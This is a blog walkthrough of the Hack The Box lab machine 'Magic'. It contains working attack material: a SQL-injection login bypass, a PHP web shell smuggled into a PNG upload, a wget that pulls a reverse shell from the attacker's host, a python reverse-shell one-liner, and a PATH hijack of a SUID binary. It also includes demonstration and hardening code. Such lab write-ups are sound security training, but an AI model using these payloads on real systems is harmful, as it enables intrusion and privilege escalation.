"Any sufficiently advanced technology is indistinguishable from magic." (Arthur C. Clarke)
In this post I write up the machine Magic from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.
Magic is a 'Medium' rated box. Submitting the user.txt flag raises your points by 15 and submitting the root flag raises them by 30.
After finding a web server on HTTP port 80, I checked the website hosted on it and found that the login page is vulnerable to SQL injection. After logging in to the web portal I'm able to upload images. With Burp Suite I modified the upload request, embedded a PHP web shell in the image and gained access as www-data with a reverse shell.
In the root folder of the web server I found the file db.php5 with credentials. As the MySQL client isn't installed on the server, I'm not able to connect to the database with these credentials. After further searching I found some MySQL programs in the '/usr/bin' folder. With the program mysqldump I dumped the database 'Magic', which contains the login credentials for the user 'theseus'.
After running LinEnum.sh I found that the program sysinfo is installed on this box and that it is SUID root. With a PATH hijack against this binary I got a reverse shell back to my machine as root and owned the box.
Are you ready to see some magic?
As always, I start with an Nmap port scan.
~$ nmap -sC -sV -oA ./nmap/magic.txt 10.10.10.185
The results of the port scan.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 15:01 EDT
Nmap scan report for 10.10.10.185
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds
There are only two open ports.
- 22/tcp (SSH)
- 80/tcp (HTTP)
Enumeration web server
I start with the enumeration of the web server and visit the web page http://10.10.10.185. I land on a page with the ability to upload images; it seems to be an image hosting website.
At the bottom left of this page there is a login button, which redirects me to a login form.
After some trying, I'm able to log in with the following username and password. Both fields are placed unescaped into the SQL query, so the quote closes the string and the rest of the query is commented out:
username: ' or 1=1 --
password: ' or 1=1 --
I’m now able to upload images.
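To show why that payload logs you in, here is an added example (mine, not the site's PHP or anything from the box). It builds a constructed in-memory SQLite table shaped like the `login` table dumped later in this write-up, runs the login query the way a string-concatenating PHP page would, and then runs the parameterised form that refuses the same input:

```python
import sqlite3

# Constructed sample data, same columns as the `login` table dumped later on this page.
SAMPLE_ROWS = [(1, "admin", "Th3s3usW4sK1ng")]

# The value typed into both form fields in the write-up.
PAYLOAD = "' or 1=1 --"


def _db():
    """Fresh in-memory database with one user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(username, password):
    """String concatenation: user input becomes part of the SQL syntax."""
    return ("SELECT username FROM login WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(username, password):
    """Returns the matched username, or None. With PAYLOAD the WHERE clause becomes
    username = '' or 1=1 and everything after the -- is a comment, so row 1 matches."""
    row = _db().execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Parameterised query: the same input is only ever compared as a string value."""
    row = _db().execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(vulnerable_query(PAYLOAD, PAYLOAD))
    print(login_vulnerable(PAYLOAD, PAYLOAD))   # admin
    print(login_safe(PAYLOAD, PAYLOAD))         # None
```

One caveat when you move from this SQLite demo to MySQL, which is what the box runs: MySQL only treats `--` as a comment when it is followed by whitespace, so a payload that ends in `--` with nothing after it can fail once the application appends the closing quote. That is why `-- -` or `#` are the usual endings in MySQL injection payloads.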
Modify HTTP Post request on upload
I can now upload files. I tried to upload a PHP file, but that does not work: the server only allows image files. I need to fool the upload check, and I use Burp Suite for this. I like rabbits, so I took a nice rabbit picture: I downloaded a random PNG file from Google, uploaded it to the server, intercepted the upload request and modified it.
First, I changed the filename from myrabbit.png to myrabbit.php.png (line 8 in the image below). After the file header I added the following PHP web shell and removed the rest of the body (line 35 in the image):
<?php echo system($_REQUEST['shell']); ?>
After the image was uploaded, I navigated to 'http://10.10.10.185/images/uploads/myrabbit.php.png?shell=whoami'. The web shell executed the command 'whoami' and returned its output in the response.
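As an added example of the file-type trick (my own code, not the box's upload.php, whose exact checks are not shown in this write-up), the block below builds a file that is simultaneously a valid PNG and a PHP script, shows the kind of check a double extension plus intact magic bytes slips past, and then shows what a hardened upload handler does instead: accept a single extension only, pick its own filename, and keep only the parsed image chunks so anything appended after IEND is dropped. It goes slightly beyond the write-up by keeping the whole image intact rather than only its header:

```python
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png", "jpg", "jpeg"}
# The one-liner used in this write-up, as bytes.
WEB_SHELL = b"<?php echo system($_REQUEST['shell']); ?>"


def _chunk(ctype, payload):
    """One PNG chunk: 4-byte length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png():
    """A valid 1x1 RGB PNG built from scratch, so nothing has to be downloaded."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8 bits/channel, RGB
    scanline = b"\x00" + b"\xff\xff\xff"                 # filter type 0 + one white pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def polyglot(php=WEB_SHELL):
    """Valid PNG with PHP appended after IEND. Image decoders ignore trailing bytes,
    while the PHP interpreter runs the <?php ... ?> block wherever it sits in the file."""
    return minimal_png() + b"\n" + php


def naive_accepts(filename, data):
    """The kind of check myrabbit.php.png defeats: last extension plus magic bytes only."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT and data.startswith(PNG_SIG)


def strip_after_iend(data):
    """Walk the chunk list, verify each CRC, and drop everything after IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError("bad CRC in chunk " + ctype.decode("ascii", "replace"))
        pos += 12 + length
        if ctype == b"IEND":
            return data[:pos]
    raise ValueError("no IEND chunk")


def hardened_store(filename, data):
    """Single extension only, server-chosen name, only parsed image bytes kept.
    Returns (stored_name, clean_bytes) or None. Only PNG is parsed here; a real
    handler needs a parser per accepted format (or re-encodes the image)."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return None
    try:
        clean = strip_after_iend(data)
    except (ValueError, struct.error):
        return None
    return secrets.token_hex(8) + ".png", clean


if __name__ == "__main__":
    data = polyglot()
    print(naive_accepts("myrabbit.php.png", data))     # True: the upload goes through
    print(hardened_store("myrabbit.php.png", data))    # None: two extensions, rejected
```

Whether the uploaded file is then executed as PHP depends on how PHP is wired into Apache. With `AddHandler application/x-httpd-php .php`, mod_mime treats every dot-separated part of the name as an extension, so `myrabbit.php.png` gets the PHP handler even though it ends in `.png`; a `<FilesMatch "\.php$">` rule would not match it. Renaming the file server-side removes that dependency entirely, which is why the hardened version never reuses the client's filename.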
Reverse shell as www-data
Through the web shell I can now download my PHP file containing the reverse shell to my machine with 'http://10.10.10.185/images/uploads/myrabbit.php.png?shell=wget 10.10.10.14.42:8000/php-reverse-shell.php' (the file lands in the directory the web server process runs in, which is writable because the upload worked). After the PHP file is downloaded, I execute it with 'http://10.10.10.185/images/uploads/myrabbit.php.png?shell=php -f php-reverse-shell.php'. I get a reverse shell as the user www-data.
~$ whoami
www-data
I upgraded the shell to a proper pty:
~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
With an upgraded shell I can start the reconnaissance to get the user flag. I begin by enumerating the users on this box. In the home folder there is one other user account:
/home$ ls
theseus
In 'www/Magic' I found the file 'db.php5' with the username theseus and the password iamkingtheseus. These are the credentials for the MySQL database. The mysql client isn't installed on the box, but mysqldump is, so I use it to dump the database Magic with these credentials (the password on the command line is visible to other users in the process list, which is acceptable on a CTF box but not in a real engagement):
www-data@ubuntu:/tmp$ /usr/bin/mysqldump --databases Magic --user=theseus --password=iamkingtheseus > dump.sql
The dump of the table login contains the credentials, stored in plaintext rather than hashed:
--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-22 14:18:50
The password from the database is reused for the local account, so I switch to the user theseus:
www-data@ubuntu:/tmp$ su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$ whoami
theseus
theseus@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
theseus@ubuntu:~$ cat user.txt
eb0041b0dddb7b8610cb79e0fff91cb0
Privilege Escalation using PATH variable
After getting the user flag I enumerated the machine further with LinEnum.sh. I transferred the script from my machine to the box and ran it. In the results I found a SUID root binary that does not belong to a stock install, /bin/sysinfo:
theseus@ubuntu:~/Desktop$ bash LinEnum.sh
...
[-] SUID files:
...
-rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct 1 2019 /snap/core/7917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7917/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan 8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan 8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
...
The '/bin' directory holds the system's essential executables. The program 'sysinfo' does not come pre-installed with Ubuntu; it is a custom program that was installed by hand. When I run it, it prints the hardware information of the machine.
The binary is SUID root (the 's' in -rwsr-x---) and executable by the group users, which theseus belongs to, so it runs with root privileges and can be a way to escalate. I only need to find how to exploit sysinfo. I started Googling and found an article on hackingarticles.in about privilege escalation using the PATH variable.
I needed to put the pieces together, so I asked one of my contacts from Hack The Box if he could help me, and he did. He advised me to create a file named lshw, place it in the directory /tmp/payload and then change the PATH variable.
And so I did. The idea is that sysinfo invokes lshw by name rather than by absolute path, so whichever lshw comes first in PATH is the one executed, and it inherits the root privileges of sysinfo. I created the file lshw with the reverse shell command below (a file without a shebang is run by /bin/sh, so this single line is enough):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I dropped this file in the /tmp/payload folder and made it executable.
theseus@ubuntu:/tmp/payload$ chmod 775 lshw
Changed the PATH variable.
export PATH=/tmp/payload:$PATH
Started a reverse shell listener on my box. And then the moment of truth… I invoked this command.
theseus@ubuntu:/tmp/payload$ /bin/sysinfo
And the reverse shell is established! Bingo, I can now get the root flag and take a beer.
/home/htb/boxes/machines/magic/http$ nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:39596.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# ls
lshw
# pwd
/tmp/payload
# cd /root
# cat root.txt
d940dcff8146f4a3764d9f069541f368
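To make the mechanism behind this escalation concrete, here is an added example, written by me and not taken from the box or from the sysinfo binary. The first part shows the triage step I would do before asking anyone: pull printable strings out of a binary the way strings(1) does and flag command lines whose program is given by bare name, since those are resolved through PATH. The byte blob is constructed and hypothetical, not the contents of /bin/sysinfo. The second part simulates the hijack itself in a temporary directory, running `lshw -short` through the shell with a caller-controlled PATH, and contrasts it with the fixed PATH a hardened SUID program should set for itself:

```python
import os
import re
import shutil
import subprocess
import tempfile

# Constructed stand-in for `strings /bin/sysinfo`: hypothetical command strings such a
# program might hand to popen()/system(), plus some noise. Not the real binary.
SAMPLE_BLOB = b"\x7fELF\x02\x01\x01" + b"\x00".join([
    b"lshw -short", b"fdisk -l", b"cat /proc/cpuinfo",
    b"/usr/bin/free -h", b"Hardware Info", b"_ITM_deregisterTMCloneTable",
]) + b"\x00"


def strings_in(blob, minimum=4):
    """Printable ASCII runs of at least `minimum` bytes, as strings(1) extracts them."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % minimum, blob)]


def relative_commands(strings):
    """Program names invoked without an absolute path, hence resolved through PATH.
    Heuristic: lowercase command name followed by a flag or a path argument."""
    hits = []
    for s in strings:
        m = re.match(r"^([a-z][a-z0-9_.-]*)\s+(?:-|/)", s)
        if m:
            hits.append(m.group(1))
    return hits


def hijack_demo():
    """Simulate a program that runs `lshw -short` through the shell with the caller's
    environment. A fake lshw is created in a temp dir that is prepended to PATH."""
    payload_dir = tempfile.mkdtemp(prefix="payload-")
    fake = os.path.join(payload_dir, "lshw")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")   # on the box: the reverse shell one-liner
    os.chmod(fake, 0o755)
    try:
        # Vulnerable pattern: relative command name, PATH inherited from the caller.
        env = dict(os.environ,
                   PATH=payload_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin"))
        vuln = subprocess.run(["sh", "-c", "lshw -short"], env=env,
                              capture_output=True, text=True).stdout.strip()
        # Hardened pattern: the program sets a fixed PATH (or uses an absolute path),
        # so the caller's directory is never searched.
        fixed_path = "/usr/sbin:/usr/bin:/sbin:/bin"
        resolved = shutil.which("lshw", path=fixed_path)
    finally:
        shutil.rmtree(payload_dir)
    return {"payload_dir": payload_dir,
            "vulnerable_output": vuln,
            "hardened_resolves_to": resolved}


if __name__ == "__main__":
    print(relative_commands(strings_in(SAMPLE_BLOB)))
    print(hijack_demo())
```

The simulation uses `sh -c` because `system()` and `popen()` do exactly that, and a SUID bit does not stop the kernel from handing the caller's environment, PATH included, to the new process. For the real fix, a privileged helper should either call its tools by absolute path or reset PATH to a known value before spawning anything; better still, it should not be SUID at all if all it does is shell out.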
Did you enjoy reading this write-up as much as I enjoyed writing it? Consider giving a respect point on my Hack The Box profile: https://www.hackthebox.eu/home/users/profile/224856. Thanks in advance!
This blog is completely free of advertisements. Please consider buying me a coffee. Thanks!